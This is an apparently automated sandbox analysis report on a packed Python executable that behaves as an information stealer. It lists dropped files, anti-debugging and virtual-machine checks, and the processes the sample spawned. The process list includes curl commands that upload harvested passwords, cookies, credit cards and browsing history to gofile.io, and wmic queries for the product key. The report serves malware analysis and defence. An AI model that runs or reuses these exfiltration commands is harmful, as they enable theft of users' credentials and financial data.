Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\python311.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\libcrypto-3-x64.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_ed25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_ed448.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\charset_normalizer\md__mypyc.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75802\win32com\shell\shell.pyd	Jump to dropped file

Source: C:\Users\user\Desktop\main.exe

File created: C:\Users\user\AppData\Local\Temp\_MEI75802\MarkupSafe-3.0.2.dist-info\LICENSE.txt

Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\main.exe

Code function: 0_2_00007FF733394C40 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,

0_2_00007FF733394C40

Source: C:\Users\user\Desktop\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_ARC4.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\zstandard\_cffi.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin\win32ui.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_chacha20.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_cffi_backend.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_pkcs1_decode.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\ossl-modules\legacy.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_poly1305.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_webp.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\zstandard\backend_c.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography\hazmat\bindings\_rust.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_curve448.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin\mfc140u.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_curve25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_uuid.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_des.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\win32\_win32sysloader.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\python3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imagingcms.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\psutil\_psutil_windows.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Math\_modexp.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_brotli.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imaging.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_elementtree.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Util\_strxor.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imagingtk.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\markupsafe\_speedups.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32\pywintypes311.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Util\_cpuid_c.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\win32\win32api.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\win32\win32trace.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32\pythoncom311.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\charset_normalizer\md.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imagingmath.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\python311.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\libcrypto-3-x64.dll	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_ed25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_ed448.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\charset_normalizer\md__mypyc.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\win32com\shell\shell.pyd	Jump to dropped file

Found evasive API chain checking for process token information

Source: C:\Users\user\Desktop\main.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct

Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF733398840 FindFirstFileExW,FindClose,	0_2_00007FF733398840
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF733397800 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00007FF733397800
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333B2AE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF7333B2AE4

Source: main.exe, 00000002.00000003.1977044312.000001E8935F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975698701.000001E8935C5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787609743.000001E8935EA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1786073333.000001E8935EA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1793564892.000001E89359C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1789469075.000001E8935EA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976909466.000001E8935C6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1783710038.000001E893604000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2001043628.000001E8935FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: curl.exe, 00000010.00000002.1850359269.000001A228639000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\main.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\main.exe

Code function: 0_2_00007FF73339C6FC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF73339C6FC

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\main.exe

Code function: 0_2_00007FF7333B46F0 GetProcessHeap,

0_2_00007FF7333B46F0

Enables debug privileges

Source: C:\Users\user\Desktop\main.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF73339C8A0 SetUnhandledExceptionFilter,	0_2_00007FF73339C8A0
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF73339BE60 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF73339BE60
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF73339C6FC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF73339C6FC
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333AB558 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF7333AB558

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\main.exe	Process created: C:\Users\user\Desktop\main.exe "C:\Users\user\Desktop\main.exe"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path softwarelicensingservice get OA3xOriginalProductKey"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path softwarelicensingservice get OA3xOriginalProductKey	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
